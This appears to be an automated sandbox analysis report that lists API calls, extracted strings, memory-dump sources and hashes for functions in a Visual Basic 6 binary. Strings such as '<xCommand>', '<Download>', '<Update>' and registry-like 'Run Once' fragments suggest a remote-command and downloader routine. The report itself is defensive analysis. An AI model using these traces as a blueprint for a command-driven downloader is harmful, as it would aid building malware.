#712.MSVBVM60(00000000,0040728C,00406674,00000001,000000FF,00000000,?,?,?,00000000,004025E6), ref: 0040F291
__vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F29C
#712.MSVBVM60(00000000,00407294,00406674,00000001,000000FF,00000000,?,?,?,00000000,004025E6), ref: 0040F2BD
__vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F2C8
__vbaInStr.MSVBVM60(00000000,004072A0,00000001,00000001,?,?,?,00000000,004025E6), ref: 0040F2E2
__vbaInStr.MSVBVM60(00000000,004072AC,00000001,00000001,?,?,?,00000000,004025E6), ref: 0040F2FF
#712.MSVBVM60(00000000,004072A0,004072B8,00000001,000000FF,00000000), ref: 0040F33A
__vbaStrMove.MSVBVM60 ref: 0040F345
#712.MSVBVM60(00000000,004072AC,004072C0,00000001,000000FF,00000000), ref: 0040F366
__vbaStrMove.MSVBVM60 ref: 0040F371
__vbaInStr.MSVBVM60(00000000,004072A0,00000001,00000001), ref: 0040F38B
__vbaInStr.MSVBVM60(00000000,004072AC,00000001,00000001), ref: 0040F3A8
__vbaInStr.MSVBVM60(00000000,<xCommand,00000001,00000001), ref: 0040F3CA

Strings

Param, xrefs: 0040F67E
8, xrefs: 0040F879
</xCommand>, xrefs: 0040F425
Version, xrefs: 0040F817
URL, xrefs: 0040F633, 0040F7CC
<Update>, xrefs: 0040F716
<xCommand, xrefs: 0040F3C3
</Download>, xrefs: 0040F52A
</Update>, xrefs: 0040F74F
<Download>, xrefs: 0040F4F1

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Move$Free$#712$#516#631BstrChkstkErrorFile$#525#570#648CloseCopyGet3Open
String ID: 8$</Download>$</Update>$</xCommand>$<Download>$<Update>$<xCommand$Param$URL$Version
API String ID: 3601514899-954089795
Opcode ID: 691ee2edf4af6776942d29cbf2e5881f73f70abf8b28773798784accf01272c1
Instruction ID: 2d68e6c41ca87c00c381124143961c125374000113fd64c2ef600be50ae681ef
Opcode Fuzzy Hash: 691ee2edf4af6776942d29cbf2e5881f73f70abf8b28773798784accf01272c1
Instruction Fuzzy Hash: 0012ED71900208EFDB14DFE0DE49BDDBBB5BB48305F208179E502BB2A4DB795A49CB58

Function 004111A0 Relevance: 103.8, APIs: 69, Instructions: 297COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(00000000,00000000), ref: 004111FE
__vbaStrCopy.MSVBVM60 ref: 00411206
__vbaOnError.MSVBVM60(00000001), ref: 0041120A
#648.MSVBVM60(0000000A), ref: 00411222
__vbaFreeVar.MSVBVM60 ref: 00411231
__vbaI2I4.MSVBVM60(?), ref: 00411243
__vbaFileOpen.MSVBVM60(00000020,000000FF,00000000), ref: 0041124A
__vbaI2I4.MSVBVM60 ref: 00411252
#570.MSVBVM60(00000000), ref: 00411255
__vbaLenBstr.MSVBVM60(00404B24), ref: 00411262
__vbaLenBstr.MSVBVM60(00404B24), ref: 00411287
#525.MSVBVM60(00000000), ref: 0041128E
__vbaStrMove.MSVBVM60 ref: 00411299
__vbaI2I4.MSVBVM60 ref: 004112A1
__vbaFileSeek.MSVBVM60(00000000,00000000), ref: 004112A5
__vbaI2I4.MSVBVM60 ref: 004112AD
__vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004112B6
__vbaStrMove.MSVBVM60(?,00000000), ref: 004112EF
__vbaStrCmp.MSVBVM60(00000000), ref: 004112F2
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0041130F
__vbaI2I4.MSVBVM60 ref: 00411471
__vbaFileClose.MSVBVM60(00000000), ref: 0041147A
__vbaI2I4.MSVBVM60 ref: 0041147E
__vbaPut3.MSVBVM60(00000004,?,00000000), ref: 00411487
__vbaStrCopy.MSVBVM60 ref: 00411495

Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E

__vbaStrMove.MSVBVM60(?), ref: 004112DE

Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117

__vbaStrCopy.MSVBVM60 ref: 004112C4

Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3

__vbaI2I4.MSVBVM60 ref: 00411323
#570.MSVBVM60(00000000), ref: 00411326
__vbaI2I4.MSVBVM60 ref: 00411339
__vbaFileSeek.MSVBVM60(00000000,00000000), ref: 0041133D
#648.MSVBVM60(0000000A), ref: 00411355
__vbaFreeVar.MSVBVM60 ref: 00411364
__vbaI2I4.MSVBVM60(?), ref: 00411370
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0041137A
#525.MSVBVM60(00001000), ref: 00411385
__vbaStrMove.MSVBVM60 ref: 00411390
__vbaI2I4.MSVBVM60 ref: 00411398
#570.MSVBVM60(00000000), ref: 0041139B
__vbaI2I4.MSVBVM60 ref: 004113D2
__vbaGet3.MSVBVM60(00000000,?,00000000), ref: 004113DB
__vbaI2I4.MSVBVM60 ref: 004113E3
__vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004113EC
#598.MSVBVM60 ref: 00411404
#525.MSVBVM60(-00000001), ref: 00411424
__vbaStrMove.MSVBVM60 ref: 0041142F
__vbaI2I4.MSVBVM60 ref: 00411437
__vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00411440
__vbaI2I4.MSVBVM60 ref: 00411448
__vbaPut3.MSVBVM60(00000000,?,00000000), ref: 00411451
#598.MSVBVM60 ref: 0041145E
__vbaStrMove.MSVBVM60(?), ref: 004114A9

Part of subcall function 0040EAB0: #594.MSVBVM60(?,6CF8D9F5,-00000001,6CF8D8B1), ref: 0040EB1A
Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60 ref: 0040EB23
Part of subcall function 0040EAB0: __vbaLenBstr.MSVBVM60 ref: 0040EB2F
Part of subcall function 0040EAB0: #631.MSVBVM60(?,?,0000000A), ref: 0040EB68
Part of subcall function 0040EAB0: __vbaStrMove.MSVBVM60(?,?,0000000A), ref: 0040EB73
Part of subcall function 0040EAB0: #516.MSVBVM60(00000000,?,?,0000000A), ref: 0040EB7A
Part of subcall function 0040EAB0: __vbaFreeStr.MSVBVM60(?,?,0000000A), ref: 0040EB89
Part of subcall function 0040EAB0: __vbaFreeVar.MSVBVM60(?,?,0000000A), ref: 0040EB92

__vbaStrMove.MSVBVM60(?), ref: 004114BD
__vbaI2I4.MSVBVM60 ref: 004114C5
__vbaPut3.MSVBVM60(00000000,?,00000000), ref: 004114CE
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 004114E2
__vbaI2I4.MSVBVM60 ref: 004114ED
__vbaFileClose.MSVBVM60(00000000), ref: 004114F0
__vbaExitProc.MSVBVM60 ref: 004114F9
__vbaI2I4.MSVBVM60 ref: 0041150F
__vbaFileClose.MSVBVM60(00000000), ref: 00411518
__vbaI2I4.MSVBVM60 ref: 0041151D
__vbaFileClose.MSVBVM60(00000000), ref: 00411520
__vbaExitProc.MSVBVM60 ref: 00411529
__vbaFreeStr.MSVBVM60(00411572), ref: 00411560
__vbaFreeStr.MSVBVM60 ref: 00411565
__vbaFreeStr.MSVBVM60 ref: 0041156A
__vbaFreeStr.MSVBVM60 ref: 0041156F
__vbaErrorOverflow.MSVBVM60 ref: 00411589

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Free$Move$File$Copy$#516#631BstrClosePut3$#525#570Get3$#598#648ErrorExitListOpenProcSeek$#537#594Overflow
String ID:
API String ID: 936154001-0
Opcode ID: 7388e1bd2b66fa6b056741b4791ef962c4142c5a93219274217dbce0ffb5ad99
Instruction ID: ff6c34d3fed2378173252cfce728cf62963b49a80d3fcd64e048a008bc34630c
Opcode Fuzzy Hash: 7388e1bd2b66fa6b056741b4791ef962c4142c5a93219274217dbce0ffb5ad99
Instruction Fuzzy Hash: F6B12D71D00218AFDB04DFE4DE88AEE7BB9FB88311F10452AE616E72A0DB745945CF58

Function 0040480F Relevance: 89.6, APIs: 47, Strings: 4, Instructions: 334COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,004025E6), ref: 0040BF4E
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 0040BF95

Part of subcall function 00418B50: __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
Part of subcall function 00418B50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75

__vbaStrCat.MSVBVM60( RO,00000000,80000002,00000000,Start,00000004,80000002,00000000,Start,00000002,80000001,00000000,00000000,00000000), ref: 0040C00B
__vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040C016
__vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,?,?,00000000,004025E6), ref: 0040C030
__vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040C03B

Part of subcall function 00418C90: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,00409F3C,80000002,00000000), ref: 00418CAE
Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CDB
Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CE7
Part of subcall function 00418C90: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418CF3
Part of subcall function 00418C90: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 00418D02
Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6), ref: 00418D1B
Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004025E6), ref: 00418D2B
Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D39
Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 00418D42
Part of subcall function 00418C90: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 00418D53
Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004025E6), ref: 00418D62
Part of subcall function 00418C90: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004025E6), ref: 00418D75
Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004025E6), ref: 00418D85
Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418D93
Part of subcall function 00418C90: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6), ref: 00418DA1
Part of subcall function 00418C90: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004025E6), ref: 00418DB1
Part of subcall function 00418C90: __vbaSetSystemError.MSVBVM60(?,?,00000000,004025E6), ref: 00418DCA
Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(00418E07,?,00000000,004025E6), ref: 00418DEE
Part of subcall function 00418C90: __vbaFreeStr.MSVBVM60(?,00000000,004025E6), ref: 00418DF7

__vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000,?,?,?,00000000,004025E6), ref: 0040C056
__vbaStrCat.MSVBVM60( RO,00000000,?,00000000,004025E6), ref: 0040C072
__vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 0040C07D
__vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000,?,00000000,004025E6), ref: 0040C096
__vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 0040C0A1
__vbaFreeStrList.MSVBVM60(00000002,?,00000000,80000002,00000000,?,00000000,004025E6), ref: 0040C0BC
__vbaCastObj.MSVBVM60(00000000,0040563C), ref: 0040C0D3
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C0DE
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040C111
__vbaFreeObj.MSVBVM60 ref: 0040C12C
__vbaNew.MSVBVM60(0040564C), ref: 0040C13E
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C149
__vbaHresultCheckObj.MSVBVM60(00000000,?,00405414,00000730), ref: 0040C17C
__vbaFreeObj.MSVBVM60 ref: 0040C197
__vbaStrCopy.MSVBVM60 ref: 0040C1C2
__vbaStrMove.MSVBVM60(00000000,00000001), ref: 0040C1D6
__vbaStrMove.MSVBVM60(?,00000000), ref: 0040C1EB
__vbaInStr.MSVBVM60(00000001,00000000), ref: 0040C1F4
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040C214
__vbaStrCopy.MSVBVM60 ref: 0040C238
__vbaStrMove.MSVBVM60(?,00000000), ref: 0040C252
__vbaStrCat.MSVBVM60(00000000), ref: 0040C259
#529.MSVBVM60(00000008), ref: 0040C26D
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040C27D

Strings

RO, xrefs: 0040C006, 0040C06D
C, xrefs: 0040480F
Start, xrefs: 0040BFC4, 0040BFE3
Once, xrefs: 0040C02B, 0040C091

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Free$Error$CopyMove$System$AnsiListUnicode$Chkstk$CheckHresult$#529BstrCast
String ID: RO$C$Once$Start
API String ID: 3306888832-2962527757
Opcode ID: 38f2c482234380c5ccf5e47192bcb562df34f22c8bdb2e96fe65b30f76930fc4
Instruction ID: 2a7bed8e637f556c1a294a0d9af7fafa12270aafcab1a65859bb43c9b5deaf43
Opcode Fuzzy Hash: 38f2c482234380c5ccf5e47192bcb562df34f22c8bdb2e96fe65b30f76930fc4
Instruction Fuzzy Hash: 24D1DC75900208EFDB04DFE4DD89BDE7BB9FB48305F108529F606B61A0DB745A45CBA8

Function 0040AE40 Relevance: 80.8, APIs: 43, Strings: 3, Instructions: 347COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(?,004025E6), ref: 0040AE5E
__vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,?,004025E6), ref: 0040AEA7
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 0040AEB6
__vbaSetSystemError.MSVBVM60(?,?,?,?,004025E6), ref: 0040AECE
__vbaSetSystemError.MSVBVM60(?,?,?,?,004025E6), ref: 0040AEF4
__vbaSetSystemError.MSVBVM60(?,?,?,?,?,?,004025E6), ref: 0040AF1D

Part of subcall function 00418B50: __vbaChkstk.MSVBVM60(00000000,004025E6,00000000,?,?,?,?,004025E6), ref: 00418B6E
Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418B9B
Part of subcall function 00418B50: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BA7
Part of subcall function 00418B50: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6,00000000), ref: 00418BB6
Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BCF
Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418BDF
Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418BED
Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418BF6
Part of subcall function 00418B50: __vbaStrToAnsi.MSVBVM60(00000004,?,00000000,00000004,(%@,00000004,?,?,?,00000000,004025E6,00000000), ref: 00418C15
Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,00000000,004025E6,00000000), ref: 00418C25
Part of subcall function 00418B50: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004025E6,00000000), ref: 00418C33
Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C3C
Part of subcall function 00418B50: __vbaSetSystemError.MSVBVM60(?,?,?,?,00000000,004025E6,00000000), ref: 00418C52
Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(00418C7C,?,?,?,00000000,004025E6,00000000), ref: 00418C6C
Part of subcall function 00418B50: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6,00000000), ref: 00418C75

__vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,?,004025E6), ref: 0040AF5A
__vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 0040AF94
__vbaSetSystemError.MSVBVM60(?,00000000), ref: 0040AFAA
__vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 0040AFC3
#525.MSVBVM60(00000104), ref: 0040AFEC
__vbaStrMove.MSVBVM60 ref: 0040AFF7
__vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 0040B02E
__vbaGenerateBoundsError.MSVBVM60 ref: 0040B06D
__vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 0040B088
__vbaSetSystemError.MSVBVM60(?,00000000,00000000), ref: 0040B0AE
__vbaStrToUnicode.MSVBVM60(?,?), ref: 0040B0BF
__vbaFreeStr.MSVBVM60 ref: 0040B0D4
#616.MSVBVM60(?,?), ref: 0040B0E9
__vbaStrMove.MSVBVM60 ref: 0040B0F7
__vbaStrMove.MSVBVM60(?), ref: 0040B111
#517.MSVBVM60(00000000), ref: 0040B118
__vbaStrMove.MSVBVM60 ref: 0040B123
__vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040B139
__vbaLenBstr.MSVBVM60(?,?,?,004025E6), ref: 0040B14D
__vbaStrCmp.MSVBVM60(00000000,?,?,?,004025E6), ref: 0040B17F
__vbaStrCmp.MSVBVM60(00000000,?,?,?,004025E6), ref: 0040B1BD
__vbaRecUniToAnsi.MSVBVM60(00404B50,?,?,?,?,004025E6), ref: 0040B204
__vbaSetSystemError.MSVBVM60(?,00000000,?,?,004025E6), ref: 0040B21A
__vbaRecAnsiToUni.MSVBVM60(00404B50,?,?,?,?,004025E6), ref: 0040B233
__vbaSetSystemError.MSVBVM60(?), ref: 0040B257
#580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 0040B2DB
__vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040B2F3
#600.MSVBVM60(00000008,00000000), ref: 0040B312
__vbaFreeVar.MSVBVM60 ref: 0040B324
#580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 0040B399
__vbaStrCat.MSVBVM60( PR,00000000,00000000), ref: 0040B3B2
#600.MSVBVM60(00000008,00000000), ref: 0040B3D1
__vbaFreeVar.MSVBVM60 ref: 0040B3E3

Part of subcall function 00410560: __vbaChkstk.MSVBVM60(?,004025E6,?,?,?,?,?,?,?,?,004025E6), ref: 0041057E
Part of subcall function 00410560: __vbaOnError.MSVBVM60(000000FF,?,?,?,?,004025E6), ref: 004105AE
Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(001F03FF,00000000,00000000,?,?,?,?,004025E6), ref: 004105E8
Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(00000000), ref: 00410611
Part of subcall function 00410560: __vbaSetSystemError.MSVBVM60(00000000), ref: 00410627

#598.MSVBVM60 ref: 0040B3F0
__vbaFreeStr.MSVBVM60(0040B456), ref: 0040B42E

Strings

4, xrefs: 0040B3E9
PR, xrefs: 0040B3AD
SE, xrefs: 0040B2EE

Memory Dump Source

Source File: 00000000.00000002.2022309950.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2021467340.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2021583300.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022551207.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2022684258.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: __vba$Error$System$Free$Ansi$Move$ChkstkUnicode$#580#600Copy$#517#525#598#616BoundsBstrConstruct2GenerateList
String ID: PR$ SE$4
API String ID: 3576955720-2816282373
Opcode ID: 1de2eecb3e22f9f67d275207b9972fb08be8cc8f6e3fb6eea473884b16e18e1a
Instruction ID: 549e129ae2bb91e84472ac49bce2616dd184e0a5e73778e746ab4582d66d714c
Opcode Fuzzy Hash: 1de2eecb3e22f9f67d275207b9972fb08be8cc8f6e3fb6eea473884b16e18e1a
Instruction Fuzzy Hash: D3F1FAB5901208EFDB14DFA0DD58BDEBBB4FB48304F1081A9E549B72A0DB785A84DF58

Function 00419150 Relevance: 73.9, APIs: 49, Instructions: 362COMMON

Download Yara Rule

APIs

__vbaStrCopy.MSVBVM60(6CF84F32,00000000,00000FEE), ref: 004191A8
__vbaStrCopy.MSVBVM60 ref: 004191B0
__vbaOnError.MSVBVM60(00000001), ref: 004191B4
#648.MSVBVM60(0000000A), ref: 004191CC
__vbaFreeVar.MSVBVM60 ref: 004191DB
__vbaFileOpen.MSVBVM60(00000120,000000FF,00000000,?), ref: 004191F4
__vbaLenBstr.MSVBVM60(004053B8), ref: 004191FF
#525.MSVBVM60(00000000), ref: 00419206
__vbaStrMove.MSVBVM60 ref: 00419217
__vbaGet3.MSVBVM60(00000000,?,00000000), ref: 0041922B
__vbaStrCopy.MSVBVM60 ref: 00419235

Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3

__vbaStrMove.MSVBVM60(?), ref: 00419245

Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117

__vbaStrMove.MSVBVM60(?,00000000), ref: 00419256
__vbaStrCmp.MSVBVM60(00000000), ref: 00419259
__vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 00419277
__vbaFileClose.MSVBVM60(00000000), ref: 0041928D
__vbaGet3.MSVBVM60(00000004,?,00000000), ref: 004192A6
__vbaLenBstr.MSVBVM60(004053B8), ref: 004192AD
__vbaGet3.MSVBVM60(00000004,0041B1A0,00000000), ref: 004192F5
